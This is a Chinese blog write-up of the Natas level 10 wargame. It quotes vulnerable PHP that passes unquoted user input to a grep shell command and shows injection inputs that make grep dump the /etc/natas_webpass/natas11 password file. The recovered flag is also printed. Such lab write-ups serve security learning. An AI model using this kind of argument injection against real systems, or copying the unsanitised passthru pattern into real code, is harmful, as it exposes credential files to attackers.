Mar 06 2020

Natas10 Writeup(正则表达式、grep命令)

作者: 绝缘体..   发布: 2020-03-06 22:04   分类: 未分类   阅读:   抢沙发  
 
更多

Natas10:

页面与上一关类似,只是增加了提示“出于安全原因,我们现在过滤某些字符”。

查看源码,发现关键代码如下:

$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {	//过滤特殊字符
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}

这题和上题类似,但使用了正则过滤,过滤掉了特殊字符;|&,使我们无法截断shell命令。

但可以利用grep命令匹配密码来实现,grep支持正则,输入 [a-zA-Z] /etc/natas_webpass/natas11 #,即可得到flag。
(或者构造如下:. /etc/natas_webpass/natas11 #)

flag:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

 

 

打赏

本文固定链接: https://www.cxy163.net/archives/5034 | 绝缘体

该日志由 绝缘体.. 于 2020年03月06日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Natas10 Writeup(正则表达式、grep命令) | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 生成社工字典
  2. CentOS下安装MariaDB
  3. CentOS7升级OpenSSL到OpenSSL1.1.1
  4. CentOS7.9离线安装PostgreSQL9.5数据库_li
  5. 手把手教你使用Vue CLI构建现代前端应用
  6. CentOS7查看开放端口命令
  7. Redis 字符串(String) 相关命令
  8. 在Debian系统上安装Python 3.7
  9. 手把手教你使用Git管理代码
  10. Python3学习之路~9.5 作业:简单主机批量管理工具
  11. 构建一个使用ASP.NET Core的跨平台Web应用
  12. CentOS 7 安装 RabbitMQ 服务器
  13. phpstorm用正则删除PHP代码空行(phpstorm多行
  14. 指定php版本 执行composer(完整命令)
  15. Centos 7.6 安装 MySQL
  16. Ubuntu 18.04安装Anaconda

Natas10 Writeup(正则表达式、grep命令):等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter